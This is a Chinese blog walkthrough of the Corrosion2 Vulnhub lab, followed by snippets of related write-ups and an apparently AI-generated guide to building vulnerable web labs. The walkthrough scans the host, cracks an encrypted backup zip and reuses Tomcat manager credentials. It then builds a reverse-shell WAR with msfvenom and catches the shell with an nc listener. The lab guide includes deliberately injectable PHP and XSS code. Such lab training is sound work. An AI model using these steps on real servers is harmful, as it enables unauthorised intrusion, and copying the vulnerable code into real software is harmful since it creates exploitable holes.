Corrosion2靶机

最新推荐文章于 2025-12-30 15:12:49 发布

原创最新推荐文章于 2025-12-30 15:12:49 发布 · 178 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#服务器 #linux #网络

通过nmap进行靶机目标网段(192.168.37.22/24)的存活主机探测

排除到已知ip的机器之后，确认靶机的的ip为192.168.37.131

使用nmap探测主机开放端口及对应服务

确定靶机开放了22、80、8080端口，对应为ssh远程服务和两个web服务，分别打开对应web界面

按照靶机作者枚举的提示，本次使用dirsearch工具进行扫描两个web服务，使用默认字典的进行爆破

readme中说明了系统管理员提供了一些有用的文件，并且应该被加密了

下载backup.zip文件之后，发现这个zip文件是被加密，推测这个文件就是readme.txt中说到的文件。尝试使用fcrackzip利用字典进行破解，成功破解出密码,获取出密码之后，解压zip文件

发现里面存放的tomcat-users.xml文件记录的系统tomcat的manager管理员账户密码

用压缩包中记录的账号密码登录，网站的manager控制后台，发现可以部署直接在线部署war包，可以利用这个点进行shell反弹

sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST="192.168.37.22" LPORT=8888 -f war > jsp_java.war

war构建完成之后，上传war包进行利用

nc -lvp 8888

点击箭头处访问对应连接就能获取到反弹shell了,成功获取到shell

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Paper_F1nd

关注关注

5
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Vulnhub靶机：Corrosion 2

qq_48904485的博客

01-10

1216

运行环境：Virtualbox攻击机：kali（10.0.2.15）靶机：corrosion:2（10.0.2.13）目标：获取靶机root权限和flag靶机下载地址：https://www.vulnhub.com/entry/corrosion-2,745/

Vulnhub——Corrosion:2靶机

Re1_zf的博客

11-28

457

使用john对压缩包密码进行一下破解zip2john backup.zip > pass.txt //先用zip2john爆出hash文件john --wordlist=/usr/share/wordlists/rockyou.txt //再用john结合字典爆出密码。

参与评论您还未登录，请先登录后发表或查看评论

Corrosion2靶机攻略

weixin_74124665的博客

08-01

1320

下载完成后直接右击用VM打开，重试一下就可以了右击虚拟机设置将网络连接改成nat模式。

Vulnhub Corrosion2靶机复现

2201_75617121的博客

08-03

330

本文记录了Corrosion2靶机渗透测试过程：首先下载并配置靶机环境，通过nmap扫描发现开放80、22、8080端口。使用dirsearch和gobuster工具进行目录探测，在8080端口发现需密码的压缩包，通过zip2john和john工具破解获得密码@administrator_hi5。解压后获取tomcat-users.xml中的凭证（manager/melehifokivai），成功登录Tomcat管理界面。随后生成JSP木马并打包为war文件上传，通过哥斯拉连接获取shell。

Vulnhub_Corrosion2靶机渗透测试

m0_66225311的博客

09-17

345

该靶机难度感觉不算大，查看好靶机给的提示，枚举是关键，在爆破压缩包，爆破randy用户密码的时候都有用到新版本的框架，多半已经修复了之前的漏洞，登陆到后台后先查看一下版本信息，搜索一下当前版本是否有漏洞收集好发现的的账号密码，一些提示性的界面，都会有所帮助本次提权使用到的是polkit提权，执行命令调用helper来执行/bin/bash获得root权限。

Corrosion2靶机wp

m0_52496313的博客

08-24

639

Corrosion2靶机wp

Corrosion2靶机渗透教程

2301_77839771的博客

08-03

277

查看配置文件 tomcat-users.xml，找到两组账户密码分别为：manager/melehifokivai 和admin/melehifokivai尝试登入，登入成功！得到一个账号：randy 下载backup.zip发现需要密码尝试爆破和Corrosion1一样得到密码：@administrator_hi5。渗透机：kali IP ：192.168.229.129 靶机IP ：192.168.229.130。使用命令：nmap -sS -sV -T4 -n -p- 192.168.0.100。

[ vulnhub靶机通关篇 ] 渗透测试综合靶场 Corrosion2 通关详解 (附靶机搭建教程)

qq_51577576的博客

11-01

1893

[ vulnhub靶机通关篇 ] 渗透测试综合靶场 Corrosion2 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限，最后提权获取最高权限，详细解读

HackMyVM-corrosion3靶机的测试报告

ccc_9wy的博客

01-16

893

基于渗透测试流程渗透corrosion3靶机；HackMyVM靶场；knock；ssh远程登录；ffufFUZZ参数；stty；RunC提权；python反弹shell。

vulnhub靶场之corrosion2

China_I_LOVE的博客

11-28

802

目录扫描一定要仔细，可能会错过重要信息对于压缩包的密码破解，使用fcrackzip或者john套件都可以tomcat一般对于用户的相关信息可能放在中tomcat中密码多用的可能性还是有的善用发现特权的命令look的一些特权用法可以在网址去查看添加或者移动文件时，要注意文件夹是否有权限unshadow的使用和john密码破解使用sudo -l寻找哪些文件可能有root权限对于python提权的方式有很多，这里是直接本地调用bash，还可以通过反弹获取终端，不过代码可能会麻烦一些。

Corrosion2( 侵蚀)靶机

m0_66299232的博客

10-02

691

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip //解出文件密码。sudo /usr/bin/python3.8 /home/randy/randombase64.py //执行之后就会触发写入的提权脚本；5.sudo -l 发现一个.py文件有权限，查看.py文件后发现，他一直调用base64。2.gzip -d rockyou.txt.gz //解压字典里的密码文件。虚拟机网络链接模式：桥接模式。将文件下载下来进行解压！

[渗透测试学习靶机04] vulnhub靶场 Corrosion: 2

weixin_47112073的博客

10-17

824

渗透测试学习靶机04-vulnhub靶场 Corrosion: 2本次靶机难度：中等。

管家婆软件套接字服务器打不开怎么解决

herinspace的博客

12-30

151

在新的端口文件夹中，修改port值为新的端口号，修改好后重启套接字服务器。右键点击套接字服务器图标，选择属性，进入兼容性选项卡，勾选“以管理员身份运行”和“以兼容模式运行”。1，检查数据库权限：打开软件安装目录下的Data文件夹，找到对应账套的mdf和ldf文件，右键点击属性，设置Everyone用户的完全控制权限。4，检查杀毒软件：如果上述步骤无效，建议暂时禁用杀毒软件，然后重新启动套接字服务器。5，重装软件：如果问题仍未解决，建议备份数据后，关闭杀毒软件，换路径重装软件。

【服务器数据恢复】连锁零售企业POS系统数据库故障数据恢复案例

SuperVault的博客

12-28

560

核心业务系统为SAP Retail，POS系统部署于320台门店服务器，采用SQL Server数据库，数据集中存储于总部IBM DS8880存储系统，配置16块10TB SAS硬盘组建RAID10阵列，核心数据总量约95TB，包括商品库存、销售数据、会员信息、供应链采购数据等，其中POS销售数据直接关系门店日常运营。会员积分无法累计，引发会员投诉。为补全13小时的销售数据，团队从三个渠道采集信息：从门店POS机本地日志提取销售记录，从会员消费记录反推销售数据，从供应链系统的商品出库记录匹配销售信息。

windows连接服务器免密

An15294874732的博客

12-25

392

将私钥下载下来，然后移动到windows的ssh配置路径下，后面再去进行config的配置。：客户端用的是私钥，服务器需要的是公钥，配置的是客户端方的config文件，加入私钥的路径。那个字符串是个标识，无所谓，然后连续三个空格即可，在默认路径下生成了私钥和公钥。文件的权限必须是600才可以。上创建或修改SSH配置文件（：在本地生成SSH密钥对（）的内容复制到服务器的。

多内网服务器公网中转通信方案（Spring Boot 2.7 + MyBatis Plus）

最新发布

weixin_42502300的博客

12-30

476

本文提出了一种基于公网中转服务器的内网通信方案，采用Spring Boot 2.7和MyBatis Plus实现。方案核心是通过公网服务器作为消息转发枢纽，连接多个内网客户端实现相互通信。主要特点包括：1）TCP Socket架构；2）内网客户端仅操作本地MySQL；3）支持自动重连、消息确认、心跳检测等机制；4）提供统一的消息格式和本地存储表结构。系统分为公网中转服务端和内网客户端两部分，服务端负责连接管理和消息转发，客户端通过本地数据库存储消息并实现业务处理。该方案适用于需要安全可靠的内网间通信场景。

服务器防止宕机

qq_35373754的博客

12-27

744

该脚本 protect.sh 是一款 Linux 系统的主动资源保护工具，通过智能适配系统环境（支持 apt/yum/dnf 包管理器）实现以下核心功能：1) 动态检测内存规格并差异化配置保护规则（内存越小限制越严格）；2) 强制扩展 SWAP 分区至≥800MB作为内存缓冲；3) 使用 cgroup 创建 system_protect 控制组，实现核心资源预留（保障系统进程）与非核心进程限制（CPU/IO/内存）；4) 通过 systemd 服务持久化配置。弥补了 Linux 内核被动保护机制的不足，特别

育碧《彩虹六号：围攻》服务器遭入侵事件与MongoBleed漏洞关联

FreeBuf_的博客

12-29

278

黑客组织攻陷《彩虹六号》服务器，玩家账户遭篡改，育碧紧急回滚数据。

Web靶机怎么做

03-20

<think>好的，我需要帮用户了解如何制作或搭建用于安全测试的Web靶机。首先，我应该回顾一下用户提供的引用内容，看看里面有没有相关的信息。引用1提到DVWA是一个用于学习的Web演练平台，而引用2详细描述了如何在Kali Linux下搭建DVWA，包括所需的环境如Apache、MySQL和PHP。这说明搭建现有靶机可能需要配置这些服务。引用4和5则提到了使用Vulnhub的靶机，并涉及渗透测试的步骤，可能涉及到下载和配置虚拟机环境。用户的问题是关于制作或搭建Web靶机，这可能包括两种途径：一种是使用现有的靶机平台（如DVWA）进行搭建，另一种是自行开发具有漏洞的Web应用作为靶机。根据引用中的信息，现有的靶机如DVWA已经设计好了常见的漏洞，比如SQL注入、XSS等，因此推荐用户先使用这些现有的解决方案，再考虑自定义开发。接下来，我需要整理搭建现有靶机的步骤。根据引用2，DVWA在Kali Linux下搭建方便，因为所需环境已经预装。步骤可能包括安装DVWA代码、配置数据库、设置文件权限等。同时，引用4和5提到Vulnhub靶机的下载和虚拟机配置，这部分需要用户下载OVA文件，使用VirtualBox或VMware导入，然后启动靶机环境。对于自行开发靶机，可能需要设置不同的漏洞场景，比如SQL注入、文件上传漏洞等，这需要一定的Web开发知识和安全意识，确保漏洞可控，不会造成真实的安全风险。引用3提到渗透测试的流程，包括手动测试和工具辅助，这可能对开发靶机时的漏洞设计有帮助，确保漏洞的可利用性。还需要考虑用户的需求层次。如果是初学者，建议从搭建现有靶机开始，比如DVWA或OWASP Juice Shop，这些项目文档齐全，社区支持好。如果有一定经验，可以尝试从Vulnhub下载更复杂的靶机，或者自行构建漏洞环境。最后，我需要确保回答结构清晰，分步骤说明搭建现有靶机和自行开发的方法，并给出相关资源链接或引用。同时，生成的问题需要围绕搭建步骤、工具选择、漏洞设计等方面，帮助用户进一步探索。</think>### 如何制作或搭建用于安全测试的Web靶机？ #### 一、搭建现有开源靶机（推荐初学者） 1. **选择靶机平台** 推荐使用成熟的漏洞演练项目，例如： - **DVWA**：专为Web漏洞教学设计，包含SQL注入、XSS、文件上传等漏洞[^2]。 - **OWASP Juice Shop**：聚焦现代Web应用漏洞（如API滥用、逻辑漏洞）。 - **Vulnhub靶机**：提供虚拟机镜像（如Corrosion2、DC-8），覆盖综合渗透场景[^4][^5]。 2. **环境准备** - **安装Web服务器**：如Apache、Nginx。 - **配置数据库**：如MySQL、MariaDB。 - **安装PHP/Python**：根据靶机要求选择语言环境。 - **Kali Linux集成**：Kali已预装Apache、MySQL和PHP，可直接部署DVWA等靶机[^2]。 3. **部署步骤（以DVWA为例）** ```bash # 下载DVWA源码 git clone https://github.com/digininja/DVWA.git # 复制到Web目录 sudo cp -r DVWA /var/www/html/ # 配置数据库 mysql -u root -p CREATE DATABASE dvwa; GRANT ALL ON dvwa.* TO 'dvwa'@'localhost' IDENTIFIED BY 'password'; # 修改配置文件 cd /var/www/html/DVWA/config cp config.inc.php.dist config.inc.php # 调整文件权限 chmod 755 /var/www/html/DVWA/hackable/uploads/ ``` 完成后通过浏览器访问 `http://localhost/DVWA` 完成初始化[^2]。 --- #### 二、自行开发定制化靶机（需开发基础） 1. **设计漏洞场景** - **常见漏洞类型**： - SQL注入（如未过滤的用户输入）[^3] - XSS（反射型、存储型） - 文件上传漏洞（未校验文件类型） - 逻辑漏洞（如权限绕过、支付金额篡改） 2. **技术实现** - **后端框架**：使用PHP、Python（Flask/Django）或Node.js模拟漏洞。 - **数据库交互**：故意使用不安全查询，例如： ```php $id = $_GET['id']; $sql = "SELECT * FROM users WHERE id = $id"; // 未过滤的SQL注入点 ``` - **前端设计**：构造可触发XSS的输入表单，例如： ```html <input type="text" name="comment" value="<?php echo $_POST['comment']; ?>"> ``` 3. **安全隔离** - 使用虚拟机或Docker容器隔离靶机环境。 - 禁用外部网络访问，防止漏洞被恶意利用。 --- #### 三、工具与资源推荐 1. **现成工具** - **Metasploitable**：预置漏洞的Linux镜像。 - **bWAPP**：包含100+漏洞场景的PHP靶机。 2. **学习资源** - Vulnhub靶机教程（如Corrosion2、DC-8渗透步骤）[^4]。 - OWASP Top 10漏洞清单（指导漏洞设计）。 ---